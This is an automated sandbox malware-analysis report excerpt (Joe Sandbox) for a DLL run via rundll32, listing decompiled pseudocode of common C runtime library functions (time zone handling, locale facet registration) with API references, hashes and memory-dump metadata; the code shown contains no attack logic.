                            • Part of subcall function 6E24D5FF: _abort.LIBCMT ref: 6E24D67D
                          • _memcmp.LIBVCRUNTIME ref: 6E24EC2E
                          • _free.LIBCMT ref: 6E24EC9F
                          • _free.LIBCMT ref: 6E24ECB8
                          • _free.LIBCMT ref: 6E24ECEA
                          • _free.LIBCMT ref: 6E24ECF3
                          • _free.LIBCMT ref: 6E24ECFF
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.491922041.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000002.00000002.490968383.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.507696729.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511770021.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511847057.000000006E2C8000.00000040.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511938993.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511969094.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: _free$ErrorLast$_abort_memcmp
                          • String ID: C
                          • API String ID: 1679612858-1037565863
                          • Opcode ID: 6a6fa75c753b15ece908a815969655c54366d2d8d26146940af82ee3fc049b99
                          • Instruction ID: b1b15a0b1200166e04248ea529bcf5a4c7a177af09dd3a0eb513ee286b4b1cfc
                          • Opcode Fuzzy Hash: 6a6fa75c753b15ece908a815969655c54366d2d8d26146940af82ee3fc049b99
                          • Instruction Fuzzy Hash: 56C15D7590121EDFEB68DF58C888A9DB7B6FF49704F1045AAD94AAB350D731AE80CF40
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E258951, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 171timeCOMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 71%
                          			E6E258951(void* __ebx, void* __edi, void* __eflags) {
				int _v8;
				int _v12;
				int _v16;
				int _v20;
				signed int _v56;
				char _v268;
				intOrPtr _v272;
				char _v276;
				char _v312;
				char _v316;
				void* __esi;
				void* __ebp;
				void* _t36;
				signed int _t38;
				signed int _t42;
				signed int _t50;
				void* _t54;
				void* _t56;
				signed int* _t61;
				intOrPtr _t71;
				void* _t78;
				signed int _t85;
				void* _t87;
				signed int _t88;
				signed int _t90;
				int _t94;
				char** _t96;
				signed int _t100;
				signed int _t101;
				signed int _t106;
				signed int _t107;
				intOrPtr _t116;
				intOrPtr _t118;

				_t89 = __edi;
				_t96 = E6E25822B();
				_t1 =  &_v8; // 0x6e272130
				_v8 = 0;
				_v12 = 0;
				_v16 = 0;
				_t36 = E6E258289(_t1);
				_pop(_t78);
				if(_t36 != 0) {
					L19:
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E6E242188();
					asm("int3");
					_t106 = _t107;
					_t38 =  *0x6e2c506c; // 0x8e829fa6
					_v56 = _t38 ^ _t106;
					 *0x6e2c5384 =  *0x6e2c5384 | 0xffffffff;
					 *0x6e2c5378 =  *0x6e2c5378 | 0xffffffff;
					_push(0);
					_push(_t96);
					_t90 = 0;
					 *0x6e2c7a10 = 0;
					_t42 = E6E251216(0x6e272130, _t87, 0, __eflags,  &_v316,  &_v312, 0x100, 0x6e272130);
					__eflags = _t42;
					if(_t42 != 0) {
						__eflags = _t42 - 0x22;
						if(_t42 == 0x22) {
							_t101 = E6E24F26D(_t78, _v272);
							__eflags = _t101;
							if(__eflags != 0) {
								_t50 = E6E251216(0x6e272130, _t87, 0, __eflags,  &_v276, _t101, _v272, 0x6e272130);
								__eflags = _t50;
								if(_t50 == 0) {
									E6E24CBD3(0);
									_t90 = _t101;
								} else {
									_push(_t101);
									goto L26;
								}
							} else {
								_push(0);
								L26:
								E6E24CBD3();
							}
						}
					} else {
						_t90 =  &_v268;
					}
					asm("sbb esi, esi");
					_t100 =  ~(_t90 -  &_v268) & _t90;
					__eflags = _t90;
					if(__eflags == 0) {
						L34:
						E6E258951(0x6e272130, _t90, __eflags);
					} else {
						__eflags =  *_t90;
						if(__eflags == 0) {
							goto L34;
						} else {
							_push(_t90);
							E6E25877C(0x6e272130, _t90, __eflags);
						}
					}
					E6E24CBD3(_t100);
					__eflags = _v12 ^ _t106;
					return E6E21F8A5(_v12 ^ _t106, _t87, _t100);
				} else {
					_t54 = E6E258231( &_v12);
					_pop(_t78);
					if(_t54 != 0) {
						goto L19;
					} else {
						_t56 = E6E25825D( &_v16);
						_pop(_t78);
						if(_t56 != 0) {
							goto L19;
						} else {
							E6E24CBD3( *0x6e2c7a08);
							 *0x6e2c7a08 = 0;
							 *_t107 = 0x6e2c7a18;
							if(GetTimeZoneInformation(??) != 0xffffffff) {
								_t85 =  *0x6e2c7a18 * 0x3c;
								_t88 =  *0x6e2c7a6c; // 0x0
								_push(__edi);
								 *0x6e2c7a10 = 1;
								_v8 = _t85;
								_t116 =  *0x6e2c7a5e; // 0x0
								if(_t116 != 0) {
									_v8 = _t85 + _t88 * 0x3c;
								}
								_t118 =  *0x6e2c7ab2; // 0x0
								if(_t118 == 0) {
									L9:
									_v12 = 0;
									_v16 = 0;
								} else {
									_t71 =  *0x6e2c7ac0; // 0x0
									if(_t71 == 0) {
										goto L9;
									} else {
										_v12 = 1;
										_v16 = (_t71 - _t88) * 0x3c;
									}
								}
								_t94 = E6E243CD0(0, _t88);
								if(WideCharToMultiByte(_t94, 0, 0x6e2c7a1c, 0xffffffff,  *_t96, 0x3f, 0,  &_v20) == 0 || _v20 != 0) {
									 *( *_t96) = 0;
								} else {
									( *_t96)[0x3f] = 0;
								}
								if(WideCharToMultiByte(_t94, 0, 0x6e2c7a70, 0xffffffff, _t96[1], 0x3f, 0,  &_v20) == 0 || _v20 != 0) {
									 *(_t96[1]) = 0;
								} else {
									_t96[1][0x3f] = 0;
								}
							}
							 *(E6E258225()) = _v8;
							 *(E6E258219()) = _v12;
							_t61 = E6E25821F();
							 *_t61 = _v16;
							return _t61;
						}
					}
				}
			}




































                          0x6e258951
                          0x6e258960
                          0x6e258964
                          0x6e258967
                          0x6e25896b
                          0x6e25896e
                          0x6e258971
                          0x6e258976
                          0x6e258979
                          0x6e258aa1
                          0x6e258aa1
                          0x6e258aa2
                          0x6e258aa3
                          0x6e258aa4
                          0x6e258aa5
                          0x6e258aa6
                          0x6e258aab
                          0x6e258aaf
                          0x6e258ab7
                          0x6e258abe
                          0x6e258ac1
                          0x6e258ace
                          0x6e258ad5
                          0x6e258ad6
                          0x6e258add
                          0x6e258aec
                          0x6e258af3
                          0x6e258afb
                          0x6e258afd
                          0x6e258b07
                          0x6e258b0a
                          0x6e258b17
                          0x6e258b1a
                          0x6e258b1c
                          0x6e258b35
                          0x6e258b3d
                          0x6e258b3f
                          0x6e258b45
                          0x6e258b4a
                          0x6e258b41
                          0x6e258b41
                          0x00000000
                          0x6e258b41
                          0x6e258b1e
                          0x6e258b1e
                          0x6e258b1f
                          0x6e258b1f
                          0x6e258b1f
                          0x6e258b4c
                          0x6e258aff
                          0x6e258aff
                          0x6e258aff
                          0x6e258b59
                          0x6e258b5b
                          0x6e258b5d
                          0x6e258b5f
                          0x6e258b6f
                          0x6e258b6f
                          0x6e258b61
                          0x6e258b61
                          0x6e258b64
                          0x00000000
                          0x6e258b66
                          0x6e258b66
                          0x6e258b67
                          0x6e258b6c
                          0x6e258b64
                          0x6e258b75
                          0x6e258b80
                          0x6e258b8b
                          0x6e25897f
                          0x6e258983
                          0x6e258988
                          0x6e25898b
                          0x00000000
                          0x6e258991
                          0x6e258995
                          0x6e25899a
                          0x6e25899d
                          0x00000000
                          0x6e2589a3
                          0x6e2589a9
                          0x6e2589ae
                          0x6e2589b4
                          0x6e2589c4
                          0x6e2589ca
                          0x6e2589d1
                          0x6e2589d7
                          0x6e2589db
                          0x6e2589e1
                          0x6e2589e4
                          0x6e2589eb
                          0x6e2589f2
                          0x6e2589f2
                          0x6e2589f5
                          0x6e2589fc
                          0x6e258a14
                          0x6e258a14
                          0x6e258a17
                          0x6e2589fe
                          0x6e2589fe
                          0x6e258a05
                          0x00000000
                          0x6e258a07
                          0x6e258a09
                          0x6e258a0f
                          0x6e258a0f
                          0x6e258a05
                          0x6e258a1f
                          0x6e258a3b
                          0x6e258a4b
                          0x6e258a42
                          0x6e258a44
                          0x6e258a44
                          0x6e258a69
                          0x6e258a7b
                          0x6e258a70
                          0x6e258a73
                          0x6e258a73
                          0x6e258a69
                          0x6e258a85
                          0x6e258a8f
                          0x6e258a94
                          0x6e258a99
                          0x6e258aa0
                          0x6e258aa0
                          0x6e25899d
                          0x6e25898b

                          APIs
                          • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,6E272130), ref: 6E2589BB
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,6E2C7A1C,000000FF,00000000,0000003F,00000000,?,?), ref: 6E258A33
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,6E2C7A70,000000FF,?,0000003F,00000000,?), ref: 6E258A60
                          • _free.LIBCMT ref: 6E2589A9
                            • Part of subcall function 6E24CBD3: HeapFree.KERNEL32(00000000,00000000,?,6E25CFAF,00000000,00000000,00000000,00000000,?,6E25D2B4,00000000,00000007,00000000,?,6E25C0FC,00000000), ref: 6E24CBE9
                            • Part of subcall function 6E24CBD3: GetLastError.KERNEL32(00000000,?,6E25CFAF,00000000,00000000,00000000,00000000,?,6E25D2B4,00000000,00000007,00000000,?,6E25C0FC,00000000,00000000), ref: 6E24CBFB
                          • _free.LIBCMT ref: 6E258B75
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.491922041.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000002.00000002.490968383.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.507696729.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511770021.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511847057.000000006E2C8000.00000040.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511938993.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511969094.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                          • String ID: 0!'n$0!'n
                          • API String ID: 1286116820-1210743812
                          • Opcode ID: 0e957e57a3366cc4c98d139204c32eb19a9813d234304db0f231b67da4120158
                          • Instruction ID: d25bdfec5466c19293491472b3e610894336dc36d7c6d903214690091bb99764
                          • Opcode Fuzzy Hash: 0e957e57a3366cc4c98d139204c32eb19a9813d234304db0f231b67da4120158
                          • Instruction Fuzzy Hash: 1A51D77181061EEFDB48DFF9CD449AAB7BFAB41710B100A7AE411E7390D7B09A50CB60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E20FC89, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 54COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 77%
                          			E6E20FC89(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t27;
				intOrPtr* _t28;
				intOrPtr* _t55;
				intOrPtr* _t63;
				intOrPtr* _t64;
				void* _t66;

				_t48 = __ebx;
				E6E2200AC(0x6e2683cf, __ebx, __edi, __esi, 0x14);
				E6E206653(_t66 - 0x14, 0);
				_t63 =  *0x6e2c6dd0; // 0x0
				 *(_t66 - 4) =  *(_t66 - 4) & 0x00000000;
				 *((intOrPtr*)(_t66 - 0x10)) = _t63;
				_t27 = E6E1E161C(0x6e2c6d60);
				_t51 =  *((intOrPtr*)(_t66 + 8));
				_t28 = E6E1E171B( *((intOrPtr*)(_t66 + 8)), _t27);
				_t61 = _t28;
				if(_t28 != 0) {
					L5:
					E6E2066BA(_t66 - 0x14);
					return E6E220075(_t61);
				} else {
					if(_t63 == 0) {
						_push( *((intOrPtr*)(_t66 + 8)));
						_push(_t66 - 0x10);
						__eflags = E6E21162A(__ebx, _t51, __edx, _t61, _t63) - 0xffffffff;
						if(__eflags == 0) {
							_t55 = _t66 - 0x20;
							E6E1E1438(_t55);
							E6E223D74(_t66 - 0x20, 0x6e2c3504);
							asm("int3");
							E6E2200AC(0x6e26851f, __ebx, _t61, _t63, 4);
							_t64 = _t55;
							 *((intOrPtr*)(_t66 - 0x10)) = _t64;
							 *((intOrPtr*)(_t64 + 4)) =  *((intOrPtr*)(_t66 + 0xc));
							_push( *((intOrPtr*)(_t66 + 0x14)));
							_t21 = _t66 - 4;
							 *_t21 =  *(_t66 - 4) & 0x00000000;
							__eflags =  *_t21;
							 *_t64 = 0x6e26c0c4;
							 *((char*)(_t64 + 0x28)) =  *((intOrPtr*)(_t66 + 0x10));
							E6E21542F(_t48, _t55, __edx, _t61, _t64,  *_t21);
							return E6E220075(_t64,  *((intOrPtr*)(_t66 + 8)));
						} else {
							_t61 =  *((intOrPtr*)(_t66 - 0x10));
							 *((intOrPtr*)(_t66 - 0x10)) = _t61;
							 *(_t66 - 4) = 1;
							E6E206FD3(__eflags, _t61);
							 *0x6e26a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t61 + 4))))();
							 *0x6e2c6dd0 = _t61;
							goto L5;
						}
					} else {
						_t61 = _t63;
						goto L5;
					}
				}
			}









                          0x6e20fc89
                          0x6e20fc90
                          0x6e20fc9a
                          0x6e20fc9f
                          0x6e20fcaa
                          0x6e20fcae
                          0x6e20fcb1
                          0x6e20fcb6
                          0x6e20fcba
                          0x6e20fcbf
                          0x6e20fcc3
                          0x6e20fd08
                          0x6e20fd0b
                          0x6e20fd17
                          0x6e20fcc5
                          0x6e20fcc7
                          0x6e20fccd
                          0x6e20fcd3
                          0x6e20fcdb
                          0x6e20fcde
                          0x6e20fd18
                          0x6e20fd1b
                          0x6e20fd29
                          0x6e20fd2e
                          0x6e20fd36
                          0x6e20fd3b
                          0x6e20fd3d
                          0x6e20fd43
                          0x6e20fd46
                          0x6e20fd4f
                          0x6e20fd4f
                          0x6e20fd4f
                          0x6e20fd53
                          0x6e20fd59
                          0x6e20fd5c
                          0x6e20fd68
                          0x6e20fce0
                          0x6e20fce0
                          0x6e20fce3
                          0x6e20fce7
                          0x6e20fceb
                          0x6e20fcf8
                          0x6e20fd00
                          0x6e20fd02
                          0x00000000
                          0x6e20fd02
                          0x6e20fcc9
                          0x6e20fcc9
                          0x00000000
                          0x6e20fcc9
                          0x6e20fcc7

                          APIs
                          • __EH_prolog3.LIBCMT ref: 6E20FC90
                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E20FC9A
                          • int.LIBCPMT ref: 6E20FCB1
                            • Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
                            • Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647
                          • std::_Facet_Register.LIBCPMT ref: 6E20FCEB
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E20FD0B
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 6E20FD29
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.491922041.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000002.00000002.490968383.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.507696729.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511770021.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511847057.000000006E2C8000.00000040.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511938993.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511969094.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
                          • String ID: `m,n
                          • API String ID: 651022567-3377878941
                          • Opcode ID: b8176df5bdaca437d0319d6bb8f3d0561bc381a7c0f6f2cafa9f5a949311f6f6
                          • Instruction ID: 70e9a397f8daf559b16a6cef501db3e2e9ae6d66d710fdfc6a7615a233d05766
                          • Opcode Fuzzy Hash: b8176df5bdaca437d0319d6bb8f3d0561bc381a7c0f6f2cafa9f5a949311f6f6
                          • Instruction Fuzzy Hash: CE11067590052DCBCF00EBE0CC94AEEB77BBF45714F240908E4106B2D0DBB49A44C7A1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E21BB30, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 54COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 75%
                          			E6E21BB30(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t41;
				signed int _t42;
				void* _t54;
				signed int _t93;
				signed int _t103;
				signed int _t105;
				signed int _t106;
				signed int _t107;
				void* _t110;

				_t79 = __ebx;
				E6E2200AC(0x6e2683cf, __ebx, __edi, __esi, 0x14);
				E6E206653(_t110 - 0x14, 0);
				_t105 =  *0x6e2c6e40; // 0x0
				 *(_t110 - 4) =  *(_t110 - 4) & 0x00000000;
				 *(_t110 - 0x10) = _t105;
				_t41 = E6E1E161C(0x6e2c6e20);
				_t82 =  *((intOrPtr*)(_t110 + 8));
				_t42 = E6E1E171B( *((intOrPtr*)(_t110 + 8)), _t41);
				_t102 = _t42;
				if(_t42 != 0) {
					L5:
					E6E2066BA(_t110 - 0x14);
					return E6E220075(_t102);
				} else {
					if(_t105 == 0) {
						_push( *((intOrPtr*)(_t110 + 8)));
						_push(_t110 - 0x10);
						__eflags = E6E21C229(__ebx, _t82, __edx, _t102, _t105) - 0xffffffff;
						if(__eflags == 0) {
							E6E1E1438(_t110 - 0x20);
							E6E223D74(_t110 - 0x20, 0x6e2c3504);
							asm("int3");
							E6E2200AC(0x6e2683cf, __ebx, _t102, _t105, 0x14);
							E6E206653(_t110 - 0x14, 0);
							_t106 =  *0x6e2c6e44; // 0x0
							 *(_t110 - 4) =  *(_t110 - 4) & 0x00000000;
							 *(_t110 - 0x10) = _t106;
							_t54 = E6E1E161C(0x6e2c6e24);
							_t89 =  *((intOrPtr*)(_t110 + 8));
							_t103 = E6E1E171B( *((intOrPtr*)(_t110 + 8)), _t54);
							__eflags = _t103;
							if(_t103 != 0) {
								L12:
								E6E2066BA(_t110 - 0x14);
								return E6E220075(_t103);
							} else {
								__eflags = _t106;
								if(_t106 == 0) {
									_push( *((intOrPtr*)(_t110 + 8)));
									_push(_t110 - 0x10);
									__eflags = E6E21C295(__ebx, _t89, __edx, _t103, _t106) - 0xffffffff;
									if(__eflags == 0) {
										_t93 = _t110 - 0x20;
										E6E1E1438(_t93);
										E6E223D74(_t110 - 0x20, 0x6e2c3504);
										asm("int3");
										E6E2200AC(0x6e26851f, _t79, _t103, _t106, 4);
										_t107 = _t93;
										 *(_t110 - 0x10) = _t107;
										 *((intOrPtr*)(_t107 + 4)) =  *((intOrPtr*)(_t110 + 0xc));
										_push( *((intOrPtr*)(_t110 + 0x14)));
										_t35 = _t110 - 4;
										 *_t35 =  *(_t110 - 4) & 0x00000000;
										__eflags =  *_t35;
										 *_t107 = 0x6e26c414;
										 *((char*)(_t107 + 0x28)) =  *((intOrPtr*)(_t110 + 0x10));
										E6E21D028(_t79, _t93, __edx, _t103, _t107,  *_t35);
										return E6E220075(_t107,  *((intOrPtr*)(_t110 + 8)));
									} else {
										_t103 =  *(_t110 - 0x10);
										 *(_t110 - 0x10) = _t103;
										 *(_t110 - 4) = 1;
										E6E206FD3(__eflags, _t103);
										 *0x6e26a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t103 + 4))))();
										 *0x6e2c6e44 = _t103;
										goto L12;
									}
								} else {
									_t103 = _t106;
									goto L12;
								}
							}
						} else {
							_t102 =  *(_t110 - 0x10);
							 *(_t110 - 0x10) = _t102;
							 *(_t110 - 4) = 1;
							E6E206FD3(__eflags, _t102);
							 *0x6e26a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t102 + 4))))();
							 *0x6e2c6e40 = _t102;
							goto L5;
						}
					} else {
						_t102 = _t105;
						goto L5;
					}
				}
			}












                          0x6e21bb30
                          0x6e21bb37
                          0x6e21bb41
                          0x6e21bb46
                          0x6e21bb51
                          0x6e21bb55
                          0x6e21bb58
                          0x6e21bb5d
                          0x6e21bb61
                          0x6e21bb66
                          0x6e21bb6a
                          0x6e21bbaf
                          0x6e21bbb2
                          0x6e21bbbe
                          0x6e21bb6c
                          0x6e21bb6e
                          0x6e21bb74
                          0x6e21bb7a
                          0x6e21bb82
                          0x6e21bb85
                          0x6e21bbc2
                          0x6e21bbd0
                          0x6e21bbd5
                          0x6e21bbdd
                          0x6e21bbe7
                          0x6e21bbec
                          0x6e21bbf7
                          0x6e21bbfb
                          0x6e21bbfe
                          0x6e21bc03
                          0x6e21bc0c
                          0x6e21bc0e
                          0x6e21bc10
                          0x6e21bc55
                          0x6e21bc58
                          0x6e21bc64
                          0x6e21bc12
                          0x6e21bc12
                          0x6e21bc14
                          0x6e21bc1a
                          0x6e21bc20
                          0x6e21bc28
                          0x6e21bc2b
                          0x6e21bc65
                          0x6e21bc68
                          0x6e21bc76
                          0x6e21bc7b
                          0x6e21bc83
                          0x6e21bc88
                          0x6e21bc8a
                          0x6e21bc90
                          0x6e21bc93
                          0x6e21bc9c
                          0x6e21bc9c
                          0x6e21bc9c
                          0x6e21bca0
                          0x6e21bca6
                          0x6e21bca9
                          0x6e21bcb5
                          0x6e21bc2d
                          0x6e21bc2d
                          0x6e21bc30
                          0x6e21bc34
                          0x6e21bc38
                          0x6e21bc45
                          0x6e21bc4d
                          0x6e21bc4f
                          0x00000000
                          0x6e21bc4f
                          0x6e21bc16
                          0x6e21bc16
                          0x00000000
                          0x6e21bc16
                          0x6e21bc14
                          0x6e21bb87
                          0x6e21bb87
                          0x6e21bb8a
                          0x6e21bb8e
                          0x6e21bb92
                          0x6e21bb9f
                          0x6e21bba7
                          0x6e21bba9
                          0x00000000
                          0x6e21bba9
                          0x6e21bb70
                          0x6e21bb70
                          0x00000000
                          0x6e21bb70
                          0x6e21bb6e

                          APIs
                          • __EH_prolog3.LIBCMT ref: 6E21BB37
                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E21BB41
                          • int.LIBCPMT ref: 6E21BB58
                            • Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
                            • Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647
                          • std::_Facet_Register.LIBCPMT ref: 6E21BB92
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E21BBB2
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 6E21BBD0
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.491922041.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000002.00000002.490968383.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.507696729.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511770021.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511847057.000000006E2C8000.00000040.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511938993.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511969094.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
                          • String ID: n,n
                          • API String ID: 651022567-1342484985
                          • Opcode ID: 3fbef3bfdbbb79f7d8789ad5d990f5b111c051b872b6de22f359d1a50de2a0ca
                          • Instruction ID: 5837456fd597e2c1d6db6faa0fd0dad6903885155175de41ff1d125d22556f3b
                          • Opcode Fuzzy Hash: 3fbef3bfdbbb79f7d8789ad5d990f5b111c051b872b6de22f359d1a50de2a0ca
                          • Instruction Fuzzy Hash: E7110E79A0051ECBCF00EBE0C894AEDB7BBAF44B14F100919E511AB3D0DBB49B40C791
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E21BBD6, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 54COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 77%
                          			E6E21BBD6(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t27;
				intOrPtr* _t28;
				intOrPtr* _t55;
				intOrPtr* _t63;
				intOrPtr* _t64;
				void* _t66;

				_t48 = __ebx;
				E6E2200AC(0x6e2683cf, __ebx, __edi, __esi, 0x14);
				E6E206653(_t66 - 0x14, 0);
				_t63 =  *0x6e2c6e44; // 0x0
				 *(_t66 - 4) =  *(_t66 - 4) & 0x00000000;
				 *((intOrPtr*)(_t66 - 0x10)) = _t63;
				_t27 = E6E1E161C(0x6e2c6e24);
				_t51 =  *((intOrPtr*)(_t66 + 8));
				_t28 = E6E1E171B( *((intOrPtr*)(_t66 + 8)), _t27);
				_t61 = _t28;
				if(_t28 != 0) {
					L5:
					E6E2066BA(_t66 - 0x14);
					return E6E220075(_t61);
				} else {
					if(_t63 == 0) {
						_push( *((intOrPtr*)(_t66 + 8)));
						_push(_t66 - 0x10);
						__eflags = E6E21C295(__ebx, _t51, __edx, _t61, _t63) - 0xffffffff;
						if(__eflags == 0) {
							_t55 = _t66 - 0x20;
							E6E1E1438(_t55);
							E6E223D74(_t66 - 0x20, 0x6e2c3504);
							asm("int3");
							E6E2200AC(0x6e26851f, __ebx, _t61, _t63, 4);
							_t64 = _t55;
							 *((intOrPtr*)(_t66 - 0x10)) = _t64;
							 *((intOrPtr*)(_t64 + 4)) =  *((intOrPtr*)(_t66 + 0xc));
							_push( *((intOrPtr*)(_t66 + 0x14)));
							_t21 = _t66 - 4;
							 *_t21 =  *(_t66 - 4) & 0x00000000;
							__eflags =  *_t21;
							 *_t64 = 0x6e26c414;
							 *((char*)(_t64 + 0x28)) =  *((intOrPtr*)(_t66 + 0x10));
							E6E21D028(_t48, _t55, __edx, _t61, _t64,  *_t21);
							return E6E220075(_t64,  *((intOrPtr*)(_t66 + 8)));
						} else {
							_t61 =  *((intOrPtr*)(_t66 - 0x10));
							 *((intOrPtr*)(_t66 - 0x10)) = _t61;
							 *(_t66 - 4) = 1;
							E6E206FD3(__eflags, _t61);
							 *0x6e26a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t61 + 4))))();
							 *0x6e2c6e44 = _t61;
							goto L5;
						}
					} else {
						_t61 = _t63;
						goto L5;
					}
				}
			}









                          0x6e21bbd6
                          0x6e21bbdd
                          0x6e21bbe7
                          0x6e21bbec
                          0x6e21bbf7
                          0x6e21bbfb
                          0x6e21bbfe
                          0x6e21bc03
                          0x6e21bc07
                          0x6e21bc0c
                          0x6e21bc10
                          0x6e21bc55
                          0x6e21bc58
                          0x6e21bc64
                          0x6e21bc12
                          0x6e21bc14
                          0x6e21bc1a
                          0x6e21bc20
                          0x6e21bc28
                          0x6e21bc2b
                          0x6e21bc65
                          0x6e21bc68
                          0x6e21bc76
                          0x6e21bc7b
                          0x6e21bc83
                          0x6e21bc88
                          0x6e21bc8a
                          0x6e21bc90
                          0x6e21bc93
                          0x6e21bc9c
                          0x6e21bc9c
                          0x6e21bc9c
                          0x6e21bca0
                          0x6e21bca6
                          0x6e21bca9
                          0x6e21bcb5
                          0x6e21bc2d
                          0x6e21bc2d
                          0x6e21bc30
                          0x6e21bc34
                          0x6e21bc38
                          0x6e21bc45
                          0x6e21bc4d
                          0x6e21bc4f
                          0x00000000
                          0x6e21bc4f
                          0x6e21bc16
                          0x6e21bc16
                          0x00000000
                          0x6e21bc16
                          0x6e21bc14

                          APIs
                          • __EH_prolog3.LIBCMT ref: 6E21BBDD
                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E21BBE7
                          • int.LIBCPMT ref: 6E21BBFE
                            • Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
                            • Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647
                          • std::_Facet_Register.LIBCPMT ref: 6E21BC38
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E21BC58
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 6E21BC76
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.491922041.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000002.00000002.490968383.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.507696729.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511770021.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511847057.000000006E2C8000.00000040.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511938993.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511969094.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
